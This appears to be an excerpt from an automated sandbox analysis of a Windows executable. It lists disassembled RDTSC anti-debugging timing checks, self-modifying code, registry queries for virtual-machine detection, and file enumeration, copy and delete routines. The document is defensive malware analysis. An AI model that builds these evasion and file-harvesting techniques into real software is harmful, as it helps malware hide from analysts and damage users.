              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC164B second address: EC1652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F69293 second address: F6929E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6929E second address: F692B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E061h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F692B3 second address: F692B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F696C7 second address: F696CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F696CB second address: F696CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F696CF second address: F696DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007F6E3947E056h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F706A6 second address: F706BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jl 00007F6E390E37E6h 0x0000000d jp 00007F6E390E37E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F706BB second address: F706DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6E3947E056h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6E3947E062h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70A3D second address: F70A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70A46 second address: F70A75 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6E3947E05Eh 0x00000008 jmp 00007F6E3947E061h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007F6E3947E056h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70BE5 second address: F70BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70BEB second address: F70BFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007F6E3947E056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70D0F second address: F70D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70D13 second address: F70D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70D1E second address: F70D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6E390E37E6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70D29 second address: F70D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70D2E second address: F70D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F6E390E37F8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70D4E second address: F70D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70D57 second address: F70D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F71194 second address: F7119E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7119E second address: F711BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6E390E37F3h 0x0000000c jnl 00007F6E390E37E6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F711BE second address: F711F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6E3947E056h 0x00000008 jnc 00007F6E3947E056h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jnl 00007F6E3947E056h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jng 00007F6E3947E056h 0x00000024 jmp 00007F6E3947E062h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F711F9 second address: F7121B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F8h 0x00000007 jbe 00007F6E390E3805h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F718C1 second address: F718D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E061h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F718D6 second address: F718ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6E390E37F1h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F718ED second address: F71900 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E3947E05Eh 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7200C second address: F72013 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F79FAE second address: F79FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F79984 second address: F799A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E390E37EBh 0x00000009 pop esi 0x0000000a jo 00007F6E390E37ECh 0x00000010 jp 00007F6E390E37E6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F799A0 second address: F799CF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E3947E05Ch 0x00000008 je 00007F6E3947E056h 0x0000000e jns 00007F6E3947E058h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6E3947E062h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F799CF second address: F799D9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E390E37E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F864A4 second address: F864BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6E3947E056h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f jbe 00007F6E3947E056h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F86625 second address: F8662B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8B7AB second address: F8B7B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F95F38 second address: F95F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6E390E37E6h 0x00000009 jmp 00007F6E390E37F0h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA0F95 second address: FA0F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA0F9B second address: FA0FA7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E390E37E6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9F896 second address: F9F8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6E3947E056h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9F8A0 second address: F9F8AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6E390E37E6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9FB70 second address: F9FB7C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E3947E056h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9FB7C second address: F9FB87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6E390E37E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9FE40 second address: F9FE4F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E3947E056h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9FE4F second address: F9FE57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9FFE6 second address: F9FFF2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9FFF2 second address: FA0005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA0153 second address: FA016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E063h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3F19 second address: FA3F31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6E390E37F2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3F31 second address: FA3F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3F36 second address: FA3F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3F3C second address: FA3F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3F45 second address: FA3F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3F4B second address: FA3F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA7B88 second address: FA7B91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA7CBD second address: FA7CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA7CC1 second address: FA7CDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jnc 00007F6E390E37E6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB99B7 second address: FB99D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E05Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB99D1 second address: FB99D6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB38EB second address: FB38FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6E3947E05Ch 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB38FC second address: FB3908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB3908 second address: FB390C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4A25 second address: EC4A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37ECh 0x00000007 jmp 00007F6E390E37EDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F6E390E37EEh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC5ED1 second address: FC5EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6E3947E056h 0x0000000a jns 00007F6E3947E056h 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC5EE5 second address: FC5EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC5AEE second address: FC5AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F6E3947E056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC5C54 second address: FC5C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC5C58 second address: FC5C7C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E3947E062h 0x00000008 jno 00007F6E3947E056h 0x0000000e jnl 00007F6E3947E056h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d ja 00007F6E3947E056h 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDC760 second address: FDC771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 jo 00007F6E390E37F9h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB581 second address: FDB587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB587 second address: FDB593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007F6E390E37E6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB593 second address: FDB597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB702 second address: FDB708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB708 second address: FDB721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB721 second address: FDB729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB8B2 second address: FDB8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDBA35 second address: FDBA63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F9h 0x00000007 jmp 00007F6E390E37F1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDC185 second address: FDC18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDC410 second address: FDC41C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F6E390E37E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDDEDE second address: FDDF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E05Fh 0x00000009 pop esi 0x0000000a jmp 00007F6E3947E061h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE0D59 second address: FE0D6D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE0D6D second address: FE0D73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE0D73 second address: FE0D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE22E3 second address: FE22FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6E3947E056h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F6E3947E056h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE22FA second address: FE22FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56602B8 second address: 566033E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 mov ebx, 79AA9290h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F6E3947E066h 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F6E3947E060h 0x0000001a mov ebp, esp 0x0000001c jmp 00007F6E3947E060h 0x00000021 pop ebp 0x00000022 pushad 0x00000023 call 00007F6E3947E05Eh 0x00000028 mov ecx, 7FFD6481h 0x0000002d pop esi 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007F6E3947E05Dh 0x00000036 xor ecx, 1E0C47D6h 0x0000003c jmp 00007F6E3947E061h 0x00000041 popfd 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D4F883 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EFBAD1 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_1-26849
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-26921
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B13910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B13910
